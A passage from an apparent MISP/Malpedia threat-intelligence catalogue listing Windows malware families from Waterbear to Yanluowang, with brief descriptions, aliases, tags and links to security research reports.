https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us

https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf

https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://ioc.hatenablog.com/entry/2020/08/16/132853

https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/

https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/

https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf

https://www.bleepingcomputer.com/news/security/insurance-giant-cna-hit-by-new-phoenix-cryptolocker-ransomware/

https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html

https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html

https://seguranca-informatica.pt/wastedlocker-malware-analysis/.YfAaIRUITTY.twitter

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp

https://news.sophos.com/en-us/2020/08/04/wastedlocker-techniques-point-to-a-familiar-heritage/

https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US

https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

http://www.secureworks.com/research/threat-profiles/gold-drake

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://securelist.com/wastedlocker-technical-analysis/97944/

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

Waterbear

Waterbear, also known as DbgPrint in its earlier export function, has been active since 2009. The malware is presumably developed by the BlackTech APT group and adopts advanced anti-analysis and forward-thinking design. These designs include a sophisticated shellcode stager, the ability to load plugins on-the-fly, and overall evasiveness should the C2 server fail to respond with a valid session key.

The tag is: misp-galaxy:malpedia="Waterbear"

Waterbear is also known as:

  • DbgPrint

  • EYEWELL

Table 4947. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.waterbear

https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf

https://www.zdnet.com/article/waterbear-malware-used-in-attack-wave-against-government-agencies/

https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/

https://daydaynews.cc/zh-tw/technology/297265.html

https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html

https://www.youtube.com/watch?v=6SDdUVejR2w

https://www.mandiant.com/resources/blog/chinese-espionage-tactics

WaterMiner

The tag is: misp-galaxy:malpedia="WaterMiner"

WaterMiner is also known as:

Table 4948. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer

https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner

WaterSpout

The tag is: misp-galaxy:malpedia="WaterSpout"

WaterSpout is also known as:

Table 4949. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout

https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

WebbyTea

WebbyTea is an HTTP(S) downloader that uses AES for C&C trafic encryption.

It sends detailed information about the victim’s environment, like proxy settings, system instalation date, Windows product name and version, manufacturer, product name, system boot time, time zone, computer name, user name, current time and a list of currently running processes. Data sent to the C&C server consists of the prefix "ci", a 16-characters long hexadecimal string representing the victim ID and an encrypted data about the victim’s system. After the payload is acquired from the server and successfully injected in a newly created explorer.exe process, the malware responds back with the same victim ID having the prefix changed to "cs".

The internal DLL name of the native WebbyTea is usually pe64.dll or webT64.dll (from which its name is derived).

The usual payload associated with WebbyTea is SnatchCrypto.

The tag is: misp-galaxy:malpedia="WebbyTea"

WebbyTea is also known as:

Table 4950. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.webbytea

https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/

https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

WebMonitor RAT

On its website, Webmonitor RAT is described as 'a very powerful, user-friendly, easy-to-setup and state-of-the-art monitoring tool. Webmonitor is a fully native RAT, meaning it will run on all Windows versions and languages starting from Windows XP and up, and perfectly compatible with all crypters and protectors.' Unit42 notes in their analysis that it is offered as C2-as-a-service and raises the controversial aspect that the builder allows to create client binaries that will not show any popup or dialogue during installation or while running on a target system.

The tag is: misp-galaxy:malpedia="WebMonitor RAT"

WebMonitor RAT is also known as:

  • RevCode

Table 4964. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor

https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/

https://revcode.se/product/webmonitor/

https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-actors-target-comm-apps-such-as-zoom-slack-discord

https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/

WeControl

The tag is: misp-galaxy:malpedia="WeControl"

WeControl is also known as:

Table 4965. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wecontrol

https://unit42.paloaltonetworks.com/westeal/

WellMess

WellMess is A Remote Access Trojan written in GoLang and .NET. It has hard-coded User-Agents. Attackers deploy WellMess using separate tools which also allow lateral movement, for example "gost". Command and Control traffic is handled via HTTP using the Set-Cookie field and message body.

The tag is: misp-galaxy:malpedia="WellMess"

WellMess is also known as:

Table 4966. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess

https://blog.talosintelligence.com/2020/08/attribution-puzzle.html

https://community.riskiq.com/article/541a465f/description

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf

https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf

https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html

https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html

https://censys.com/advanced-persistent-infrastructure-tracking/

https://securelist.com/apt-trends-report-q2-2020/97937/

https://us-cert.cisa.gov/ncas/alerts/aa21-116a

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf

https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

WeSteal

The tag is: misp-galaxy:malpedia="WeSteal"

WeSteal is also known as:

Table 4967. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.westeal

https://unit42.paloaltonetworks.com/westeal/

WhiskerSpy

The tag is: misp-galaxy:malpedia="WhiskerSpy"

WhiskerSpy is also known as:

Table 4968. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.whiskerspy

https://www.trendmicro.com/en_us/research/23/b/earth-kitsune-delivers-new-whiskerspy-backdoor.html

WhisperGate

Destructive malware deployed against targets in Ukraine in January 2022.

The tag is: misp-galaxy:malpedia="WhisperGate"

WhisperGate is also known as:

  • PAYWIPE

Table 4969. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.whispergate

https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html

https://blog.gigamon.com/2022/01/28/focusing-on-left-of-boom/

https://zetter.substack.com/p/dozens-of-computers-in-ukraine-wiped

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html

https://go.recordedfuture.com/hubfs/reports/pov-2022-0127.pdf

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine

https://www.recordedfuture.com/whispergate-malware-corrupts-computers-ukraine/

https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator.md

https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware/

https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine

https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html?splunk

https://www.netskope.com/blog/netskope-threat-coverage-whispergate

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf

https://blogs.microsoft.com/on-the-issues/2022/01/15/mstic-malware-cyberattacks-ukraine-government/

https://www.secureworks.com/blog/disruptive-attacks-in-ukraine-likely-linked-to-escalating-tensions

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf

https://www.secureworks.com/blog/whispergate-not-notpetya

https://github.com/OALabs/Lab-Notes/blob/main/WhisperGate/WhisperGate.ipynb

https://zetter.substack.com/p/hackers-were-in-ukraine-systems-months

https://stairwell.com/news/whispers-in-the-noise-microsoft-ukraine-whispergate/

https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/

https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/

https://inquest.net/blog/2022/02/10/380-glowspark

https://twitter.com/HuskyHacksMK/status/1482876242047258628

https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/

https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html

https://csirt-mon.wp.mil.pl/pl/articles6-aktualnosci/analysis-cyberattack-ukrainian-government-resources/

https://twitter.com/knight0x07/status/1483401072102502400

https://www.crowdstrike.com/blog/how-crowdstrike-protects-against-data-wiping-malware/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/update-on-whispergate-destructive-malware-targeting-ukraine.html

https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/

https://info.cyborgsecurity.com/hubfs/Emerging%20Threats/WhisperGate%20Malware%20Update%20-%20Emerging%20Threat.pdf

https://blogs.blackberry.com/en/2022/01/threat-thursday-whispergate-wiper

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

https://twitter.com/nunohaien/status/1484088885575622657

https://www.brighttalk.com/webcast/15591/534324

https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf

https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3

https://cert.gov.ua/article/18101

https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

https://www.crowdstrike.com/blog/who-is-ember-bear/

https://lifars.com/2022/01/a-detailed-analysis-of-whispergate-targeting-ukrainian-organizations/

https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/return-of-pseudo-ransomware.html

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?

https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation

https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html

https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/

https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

https://www.elastic.co/fr/security-labs/operation-bleeding-bear

https://thehackernews.com/2022/02/putin-warns-russian-critical.html

https://rxored.github.io/post/analysis/whispergate/whispergate/

https://www.youtube.com/watch?v=Ek3URIaC5O8

https://maxkersten.nl/binary-analysis-course/malware-analysis/dumping-whispergates-wiper-from-an-eazfuscator-obfuscated-loader/

https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://twitter.com/Libranalysis/status/1483128221956808704

https://www.cadosecurity.com/resources-for-dfir-professionals-responding-to-whispergate-malware/

https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://intel471.com/blog/russia-ukraine-conflict-cybercrime-underground

https://www.cisa.gov/uscert/ncas/alerts/aa22-057a

https://www.crowdstrike.com/blog/lessons-from-past-cyber-operations-against-ukraine/

https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa/

https://www.youtube.com/watch?v=2nd-f1dIfD4

https://unit42.paloaltonetworks.com/atoms/ruinousursa/

https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/

WhiteBird

According to Dr.Web, WhiteBird is a backdoor written in C++ and designed to operate in both 32-bit and 64-bit Microsoft Windows operating systems. The configuration is encrypted with a single byte XOR key. An interesting feature is that the malware can be restricted to operate only within certain "working_hours" with a granularity of one minute.

The tag is: misp-galaxy:malpedia="WhiteBird"

WhiteBird is also known as:

Table 4970. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird

https://st.drweb.com/static/new-www/news/2020/september/tek_rf_article_en.pdf

https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf

WildFire

The tag is: misp-galaxy:malpedia="WildFire"

WildFire is also known as:

Table 4974. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire

winlog

The tag is: misp-galaxy:malpedia="winlog"

winlog is also known as:

Table 4977. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.winlog

https://github.com/Thibault-69/Keylogger-Windows-----WinLog

Winnti (Windows)

The tag is: misp-galaxy:malpedia="Winnti (Windows)"

Winnti (Windows) is also known as:

  • BleDoor

  • JUMPALL

  • Pasteboy

  • RbDoor

Table 4979. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti

https://attack.mitre.org/groups/G0096

https://github.com/TKCERT/winnti-nmap-script

https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html

https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/

https://content.fireeye.com/api/pdfproxy?id=86840

https://www.lastline.com/labsblog/helo-winnti-attack-scan/

https://www.secureworks.com/research/threat-profiles/bronze-atlas

https://securelist.com/games-are-over/70991/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://blogs.vmware.com/security/2021/11/monitoring-winnti-4-0-c2-servers-for-two-years.html

https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/

https://github.com/br-data/2019-winnti-analyse/

https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/

http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2021-0921.pdf

https://content.fireeye.com/apt-41/rpt-apt41/

https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html

https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf

https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/

https://github.com/TKCERT/winnti-detector

https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/

https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html

https://github.com/TKCERT/winnti-suricata-lua

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage

https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf

https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/

https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf

https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf

https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf

https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf

https://www.youtube.com/watch?v=_fstHQSK-kk

https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf

https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf

http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf

https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf

http://web.br.de/interaktiv/winnti/english/

https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive

https://docplayer.net/162112338-Don-t-miss-the-forest-for-the-trees-gleaning-hunting-value-from-too-much-intrusion-data.html

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/

https://github.com/superkhung/winnti-sniff

https://securelist.com/apt-trends-report-q3-2020/99204/

https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/

https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf

https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/

https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf

WinorDLL64

According to ESET Research, this is a payload downloaded by win.wslink. They attribute it with low confidence to Lazarus.

The tag is: misp-galaxy:malpedia="WinorDLL64"

WinorDLL64 is also known as:

Table 4980. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.winordll64

https://www.welivesecurity.com/2023/02/23/winordll64-backdoor-vast-lazarus-arsenal/

WinPot

WinPot is created to make ATMs by a popular ATM vendor to automatically dispense all cash from their most valuable cassettes.

The tag is: misp-galaxy:malpedia="WinPot"

WinPot is also known as:

  • ATMPot

Table 4981. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot

https://securelist.com/atm-robber-winpot/89611/

https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/

https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/

WinScreeny

Backdoor used in the EvilPlayout campaign against Iran’s State Broadcaster.

The tag is: misp-galaxy:malpedia="WinScreeny"

WinScreeny is also known as:

Table 4982. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.winscreeny

https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/

Wonknu

The tag is: misp-galaxy:malpedia="Wonknu"

Wonknu is also known as:

Table 4987. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu

https://unit42.paloaltonetworks.com/atoms/iron-taurus/

WORMHOLE

WORMHOLE is a TCP tunneler that is dynamically configurable from a C&C server and can communicate with an additional remote machine endpoint for a relay.

The tag is: misp-galaxy:malpedia="WORMHOLE"

WORMHOLE is also known as:

Table 4992. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole

https://securelist.com/lazarus-under-the-hood/77908/

https://content.fireeye.com/apt/rpt-apt38

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf

WormLocker

The tag is: misp-galaxy:malpedia="WormLocker"

WormLocker is also known as:

  • WormLckr

Table 4993. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wormlocker

https://twitter.com/Kangxiaopao/status/1355056807924797440

XBot POS

The tag is: misp-galaxy:malpedia="XBot POS"

XBot POS is also known as:

Table 4999. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos

https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html

XBTL

The tag is: misp-galaxy:malpedia="XBTL"

XBTL is also known as:

Table 5000. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl

xCaon

Checkpoint Research found this backdoor, attributed to IndigoZebra, used to target Afghan and other Central-Asia countries, including Kyrgyzstan and Uzbekistan, since at least 2014.

The tag is: misp-galaxy:malpedia="xCaon"

xCaon is also known as:

Table 5001. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xcaon

https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

XDSpy

According to ESET Research, XDDown is a primary malware component and is strictly a downloader. It persists on the system using the traditional Run key. It downloads additional plugins from the hardcoded C&C server using the HTTP protocol. The HTTP replies contain PE binaries encrypted with a hardcoded two-byte XOR key. Plugins include a module for reconnaissance on the affected system, crawling drives, file exfiltration, SSID gathering, and grabbing saved passwords.

The tag is: misp-galaxy:malpedia="XDSpy"

XDSpy is also known as:

Table 5003. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy

https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/

https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf

https://github.com/eset/malware-ioc/tree/master/xdspy/

https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf

XenArmor

XenArmor is a suite of password recovery tools for various applications that have been observed to be abused in attacks alongside malware.

The tag is: misp-galaxy:malpedia="XenArmor"

XenArmor is also known as:

  • XenArmor Suite

Table 5004. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xenarmor

https://xenarmor.com/

Xenon Stealer

The tag is: misp-galaxy:malpedia="Xenon Stealer"

Xenon Stealer is also known as:

Table 5005. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xenon

https://twitter.com/3xp0rtblog/status/1331974232192987142

XiaoBa

Ransomware.

The tag is: misp-galaxy:malpedia="XiaoBa"

XiaoBa is also known as:

  • FlyStudio

Table 5010. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba

https://id-ransomware.blogspot.com/2017/10/xiaoba-ransomware.html

xmrig

According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".

In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.

The tag is: misp-galaxy:malpedia="xmrig"

xmrig is also known as:

Table 5011. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/

https://gridinsoft.com/xmrig

Xorist

According to PCrisk, Xorist is a family of ransomware-type malware. After stealth system infiltration, ransomware from this family encrypts various files stored on the computer. After encrypting the files, this ransomware creates a 'How to Decrypt Files.txt text file on the victim’s desktop. The file contains a message stating that the files can only be restored by paying a ransom.

The tag is: misp-galaxy:malpedia="Xorist"

Xorist is also known as:

Table 5012. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xorist

https://www.fortinet.com/blog/threat-research/Ransomware-Roundup-New-Inlock-and-Xorist-Variants

XP10

Ransomware.

The tag is: misp-galaxy:malpedia="XP10"

XP10 is also known as:

  • FakeChrome Ransomware

Table 5013. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xp10

https://id-ransomware.blogspot.com/2020/08/xp10-ransomware.html

XpertRAT

According to PCrisk, XpertRAT is a Remote Administration Trojan, a malicious program that allows cyber criminals to remotely access and control infected computers. Typically, users download and install this software inadvertently because they are tricked. By having computers infected with malware such as XpertRAT, users can experience serious problems.

The tag is: misp-galaxy:malpedia="XpertRAT"

XpertRAT is also known as:

Table 5017. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat

https://labs.k7computing.com/?p=15672

https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html

https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration

X-Tunnel (.NET)

This is a rewrite of win.xtunnel using the .NET framework that surfaced late 2017.

The tag is: misp-galaxy:malpedia="X-Tunnel (.NET)"

X-Tunnel (.NET) is also known as:

Table 5022. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel_net

https://www.ncsc.gov.uk/alerts/indicators-compromise-malware-used-apt28

Xwo

In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.

The tag is: misp-galaxy:malpedia="Xwo"

Xwo is also known as:

Table 5023. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo

https://www.alienvault.com/blogs/labs-research/xwo-a-python-based-bot-scanner

Yakuza

Ransomware.

The tag is: misp-galaxy:malpedia="Yakuza"

Yakuza is also known as:

  • Teslarvng Ransomware

Table 5027. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.yakuza_ransomware

https://id-ransomware.blogspot.com/2020/03/teslarvng-ransomware.html

Yanluowang

According to PCrisk, Yanluowang is ransomware that encrypts (and renames) files, ends all running processes, stops services, and creates the "README.txt" file containing a ransom note. It appends the ".yanluowang" extension to filenames. Cybercriminals behind Yanluowang are targeting enterprise entities and organizations in the financial sector.

Files encrypted by Yanluowang can be decrypted with this tool (it is possible to decrypt all files if the original file is larger than 3GB. If the original file is smaller than 3GB, then only smaller files can be decrypted).

The tag is: misp-galaxy:malpedia="Yanluowang"

Yanluowang is also known as:

  • Dryxiphia

Table 5029. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.yanluowang

